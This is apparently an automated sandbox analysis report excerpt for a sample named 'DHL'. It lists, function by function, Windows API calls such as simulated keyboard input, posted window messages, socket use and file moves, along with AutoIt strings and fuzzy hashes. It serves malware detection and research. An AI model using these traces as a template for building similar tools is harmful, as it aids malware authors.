                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A35A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00A32DC2
                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A32DE1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                        • String ID:
                                                        • API String ID: 3864802216-0
                                                        • Opcode ID: 3ec6776d475f58e9e79015a52518f73d9d787a7f5a6e6e4e200ea3ef311d6417
                                                        • Instruction ID: f66fc23632f7669f9323d3b4795692e572135b8906e85371a28141472f91145f
                                                        • Opcode Fuzzy Hash: 3ec6776d475f58e9e79015a52518f73d9d787a7f5a6e6e4e200ea3ef311d6417
                                                        • Instruction Fuzzy Hash: 4B318E72201214BFEB218F50CC8AFEB3FADEF09765F044055FE08AA291C6759C51CBA4
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: 2f626b5cc69f91280c9b2fcf1074ce00d87ce154cd156e6ef6cc5196771ddabf
                                                        • Instruction ID: ac4f989ea892d40c6dd4562dd3160c76dbc5dee8bf163dbb077f90b77f7b5766
                                                        • Opcode Fuzzy Hash: 2f626b5cc69f91280c9b2fcf1074ce00d87ce154cd156e6ef6cc5196771ddabf
                                                        • Instruction Fuzzy Hash: 0D219871E50A0D7BD2145631AE82FBB335CBE62384F480424FD055A5C2F722ED108DA9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                        • API String ID: 0-572801152
                                                        • Opcode ID: 6b593dc231749d3f7c65cea71ed48395dc769f9881a7892476153a127d1efe69
                                                        • Instruction ID: 30f37c7c786272f7a1cf052250d8ef2eb73c12b2d400c38d8f02b2b081ca93ab
                                                        • Opcode Fuzzy Hash: 6b593dc231749d3f7c65cea71ed48395dc769f9881a7892476153a127d1efe69
                                                        • Instruction Fuzzy Hash: F1D1C171E0061AAFDF14CFA8E890BAEB7B5BF48354F148179E915AB280E770DD41CB90
                                                        APIs
                                                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,009E17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 009E15CE
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,009E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 009E1651
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,009E17FB,?,009E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 009E16E4
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,009E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 009E16FB
                                                          • Part of subcall function 009D3820: RtlAllocateHeap.NTDLL(00000000,?,00A71444,?,009BFDF5,?,?,009AA976,00000010,00A71440,009A13FC,?,009A13C6,?,009A1129), ref: 009D3852
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,009E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 009E1777
                                                        • __freea.LIBCMT ref: 009E17A2
                                                        • __freea.LIBCMT ref: 009E17AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                        • String ID:
                                                        • API String ID: 2829977744-0
                                                        • Opcode ID: dab7120e276b0c5c75f7e5409efb0ae9f21a836cd7580a3187d1e828a1b5078d
                                                        • Instruction ID: cd3f08e5b0b838bdc9b74b5c175d252e859e972bbef51ffc073e3ac0ee25d896
                                                        • Opcode Fuzzy Hash: dab7120e276b0c5c75f7e5409efb0ae9f21a836cd7580a3187d1e828a1b5078d
                                                        • Instruction Fuzzy Hash: B891C571E002969ADF228FB6CC41EEEBBB9AF89710F184659F805E7141DB35DD80CB60
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit
                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                        • API String ID: 2610073882-625585964
                                                        • Opcode ID: 0e2ab96bddb90a754c9c682f138577b7105d4add9f2cdac3aae999c6e99e388a
                                                        • Instruction ID: dc46a393af85af0d9df9fc01d71ecb5d86b4595bb005c7ebd6349b3ac32aa7d4
                                                        • Opcode Fuzzy Hash: 0e2ab96bddb90a754c9c682f138577b7105d4add9f2cdac3aae999c6e99e388a
                                                        • Instruction Fuzzy Hash: A6917371A00225AFDF24CFA9DC44FAEBBB8EF4A714F108569F515AB280D7709945CFA0
                                                        APIs
                                                        • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00A1125C
                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A11284
                                                        • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00A112A8
                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A112D8
                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A1135F
                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A113C4
                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00A11430
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                        • String ID:
                                                        • API String ID: 2550207440-0
                                                        • Opcode ID: 0bf3b38cede13f6c6fd70599538718b3447a2e33e13a2864edec876375f00efd
                                                        • Instruction ID: 27b77ac97bcf04511855b7da3bb0036b5561b33122dceacd7be9822e257ff064
                                                        • Opcode Fuzzy Hash: 0bf3b38cede13f6c6fd70599538718b3447a2e33e13a2864edec876375f00efd
                                                        • Instruction Fuzzy Hash: E1910475A00219AFDB00DFA8D884BFEB7B9FF45725F144029EA11EB291D774E981CB90
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: 55a3e3e36dc234d14c8249fa94b0224f6c024f217a68f0a1f7996656c23cbf46
                                                        • Instruction ID: 4040ed1644ab6406c66dcf2451ac0e9923409614ea03c73f55910e63281e309e
                                                        • Opcode Fuzzy Hash: 55a3e3e36dc234d14c8249fa94b0224f6c024f217a68f0a1f7996656c23cbf46
                                                        • Instruction Fuzzy Hash: 9D913771D44219EFCB14CFA9CD84AEEBBB8FF49320F144459EA15B7251D378AA42CB60
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00A2396B
                                                        • CharUpperBuffW.USER32(?,?), ref: 00A23A7A
                                                        • _wcslen.LIBCMT ref: 00A23A8A
                                                        • VariantClear.OLEAUT32(?), ref: 00A23C1F
                                                          • Part of subcall function 00A10CDF: VariantInit.OLEAUT32(00000000), ref: 00A10D1F
                                                          • Part of subcall function 00A10CDF: VariantCopy.OLEAUT32(?,?), ref: 00A10D28
                                                          • Part of subcall function 00A10CDF: VariantClear.OLEAUT32(?), ref: 00A10D34
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                        • API String ID: 4137639002-1221869570
                                                        • Opcode ID: c4b197f049dfa23816ca774da6b8e9bc6755f3a58694a4a80f5c86c3f0fcb31b
                                                        • Instruction ID: be38e727de22d6c4b7800fc8706879e5275cd8c270eb349d085e1265358644c9
                                                        • Opcode Fuzzy Hash: c4b197f049dfa23816ca774da6b8e9bc6755f3a58694a4a80f5c86c3f0fcb31b
                                                        • Instruction Fuzzy Hash: 1A918A756083119FCB04EF28D48196AB7E4FF8A314F04882DF88997351DB35EE45CB92
                                                        APIs
                                                          • Part of subcall function 00A0000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,009FFF41,80070057,?,?,?,00A0035E), ref: 00A0002B
                                                          • Part of subcall function 00A0000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009FFF41,80070057,?,?), ref: 00A00046
                                                          • Part of subcall function 00A0000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009FFF41,80070057,?,?), ref: 00A00054
                                                          • Part of subcall function 00A0000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009FFF41,80070057,?), ref: 00A00064
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00A24C51
                                                        • _wcslen.LIBCMT ref: 00A24D59
                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00A24DCF
                                                        • CoTaskMemFree.OLE32(?), ref: 00A24DDA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                        • String ID: NULL Pointer assignment
                                                        • API String ID: 614568839-2785691316
                                                        • Opcode ID: 64be8f4e2c4bd13a4aef1bd7bc968f69c83493fed163af47e37771ffb8e25110
                                                        • Instruction ID: f34743239a0d2cf8eefeed974345e6738a74db4bbb91dabd915d058d06bfb1ba
                                                        • Opcode Fuzzy Hash: 64be8f4e2c4bd13a4aef1bd7bc968f69c83493fed163af47e37771ffb8e25110
                                                        • Instruction Fuzzy Hash: F1912771D0022DAFDF10DFA8DC80AEEB7B8BF48310F108169E915A7241DB349A44CFA0
                                                        APIs
                                                        • GetMenu.USER32(?), ref: 00A32183
                                                        • GetMenuItemCount.USER32(00000000), ref: 00A321B5
                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A321DD
                                                        • _wcslen.LIBCMT ref: 00A32213
                                                        • GetMenuItemID.USER32(?,?), ref: 00A3224D
                                                        • GetSubMenu.USER32(?,?), ref: 00A3225B
                                                          • Part of subcall function 00A03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A03A57
                                                          • Part of subcall function 00A03A3D: GetCurrentThreadId.KERNEL32 ref: 00A03A5E
                                                          • Part of subcall function 00A03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A025B3), ref: 00A03A65
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A322E3
                                                          • Part of subcall function 00A0E97B: Sleep.KERNEL32 ref: 00A0E9F3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                        • String ID:
                                                        • API String ID: 4196846111-0
                                                        • Opcode ID: 3c2fa380c7a274e9908febb0a9d82f6db17abfaa24404a896b51ed7a331d6a49
                                                        • Instruction ID: 84633dadc9dfca17960ef5214bf145985d1bceb0fb3d5cc9aa82b98231ec93ba
                                                        • Opcode Fuzzy Hash: 3c2fa380c7a274e9908febb0a9d82f6db17abfaa24404a896b51ed7a331d6a49
                                                        • Instruction Fuzzy Hash: 80714C75E00215AFCB10EFA4CD45BAEB7F5AF89320F148459F916AB351DB34ED418B90
                                                        APIs
                                                        • GetParent.USER32(?), ref: 00A0AEF9
                                                        • GetKeyboardState.USER32(?), ref: 00A0AF0E
                                                        • SetKeyboardState.USER32(?), ref: 00A0AF6F
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00A0AF9D
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00A0AFBC
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00A0AFFD
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00A0B020
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: 1f5c1ac01efde82bfab00405d803ff3f51178105420c4898a118cddcf19d7699
                                                        • Instruction ID: 1599a2bd2064d28c51c741eed5b4f1a113454bf2145f3fefd3dc9b97a8b74cc1
                                                        • Opcode Fuzzy Hash: 1f5c1ac01efde82bfab00405d803ff3f51178105420c4898a118cddcf19d7699
                                                        • Instruction Fuzzy Hash: 9751D1A0A147DA3EFB368734DD45BBBBEA95B06304F088489F1D9958C2C398ACC4D761
                                                        APIs
                                                        • GetParent.USER32(00000000), ref: 00A0AD19
                                                        • GetKeyboardState.USER32(?), ref: 00A0AD2E
                                                        • SetKeyboardState.USER32(?), ref: 00A0AD8F
                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00A0ADBB
                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00A0ADD8
                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00A0AE17
                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00A0AE38
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: 9518a0fe723e18cb6faad8dc4eac0e23f3a7b7adef6f6f74bf3c31d6562774ac
                                                        • Instruction ID: c532ceb93a556e524820a6e35e63d9410b352710a07729d00af15fbb0227c262
                                                        • Opcode Fuzzy Hash: 9518a0fe723e18cb6faad8dc4eac0e23f3a7b7adef6f6f74bf3c31d6562774ac
                                                        • Instruction Fuzzy Hash: F95107A1A147E93DFB338334DC55BBABEA95B56300F088489F1D5568C3D394EC88D762
                                                        APIs
                                                        • GetConsoleCP.KERNEL32(009E3CD6,?,?,?,?,?,?,?,?,009D5BA3,?,?,009E3CD6,?,?), ref: 009D5470
                                                        • __fassign.LIBCMT ref: 009D54EB
                                                        • __fassign.LIBCMT ref: 009D5506
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,009E3CD6,00000005,00000000,00000000), ref: 009D552C
                                                        • WriteFile.KERNEL32(?,009E3CD6,00000000,009D5BA3,00000000,?,?,?,?,?,?,?,?,?,009D5BA3,?), ref: 009D554B
                                                        • WriteFile.KERNEL32(?,?,00000001,009D5BA3,00000000,?,?,?,?,?,?,?,?,?,009D5BA3,?), ref: 009D5584
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                        • String ID:
                                                        • API String ID: 1324828854-0
                                                        • Opcode ID: 47cdf955f17599b95e17b73ed6b6e5909934a0bad025eb3f279853c3cad35690
                                                        • Instruction ID: a7afd514a030f6ca33aca619dc774a0dcd2b7b7562bfe3880fca2b04377cbe70
                                                        • Opcode Fuzzy Hash: 47cdf955f17599b95e17b73ed6b6e5909934a0bad025eb3f279853c3cad35690
                                                        • Instruction Fuzzy Hash: 7E51C070A00649AFDB11CFA8EC45AEEBBF9EF08300F15851BF555E7391D6309A81CB60
                                                        APIs
                                                        • _ValidateLocalCookies.LIBCMT ref: 009C2D4B
                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 009C2D53
                                                        • _ValidateLocalCookies.LIBCMT ref: 009C2DE1
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 009C2E0C
                                                        • _ValidateLocalCookies.LIBCMT ref: 009C2E61
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                        • String ID: csm
                                                        • API String ID: 1170836740-1018135373
                                                        • Opcode ID: 3c7aa84eec09284f1e9bad31f72879d776e4d4f275f3d2ae2c21946dcdb234ab
                                                        • Instruction ID: d7bb9b763ace8771f2d0882e1f5e35746d2287156ba7347a483bb38ad7b4d029
                                                        • Opcode Fuzzy Hash: 3c7aa84eec09284f1e9bad31f72879d776e4d4f275f3d2ae2c21946dcdb234ab
                                                        • Instruction Fuzzy Hash: F541C334E00209ABCF10DF68C845F9EBBB9BF84364F148159E8156B392DB31AA01CBD2
                                                        APIs
                                                          • Part of subcall function 00A2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A2307A
                                                          • Part of subcall function 00A2304E: _wcslen.LIBCMT ref: 00A2309B
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A21112
                                                        • WSAGetLastError.WSOCK32 ref: 00A21121
                                                        • WSAGetLastError.WSOCK32 ref: 00A211C9
                                                        • closesocket.WSOCK32(00000000), ref: 00A211F9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 2675159561-0
                                                        • Opcode ID: 6e8a8e27eefefbf68d1191ea9c2d1964c0dedd0cc98756416055340a655e55f5
                                                        • Instruction ID: c6e0ec31966f52118c061e2e5d57846bc71211aaefe3f3fb389957f4a78e0069
                                                        • Opcode Fuzzy Hash: 6e8a8e27eefefbf68d1191ea9c2d1964c0dedd0cc98756416055340a655e55f5
                                                        • Instruction Fuzzy Hash: 3C41F431600214AFDB10DF68DC85BAAB7E9FF95324F148169FD05AB291D770AE42CBE1
                                                        APIs
                                                          • Part of subcall function 00A0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A0CF22,?), ref: 00A0DDFD
                                                          • Part of subcall function 00A0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A0CF22,?), ref: 00A0DE16
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00A0CF45
                                                        • MoveFileW.KERNEL32(?,?), ref: 00A0CF7F
                                                        • _wcslen.LIBCMT ref: 00A0D005
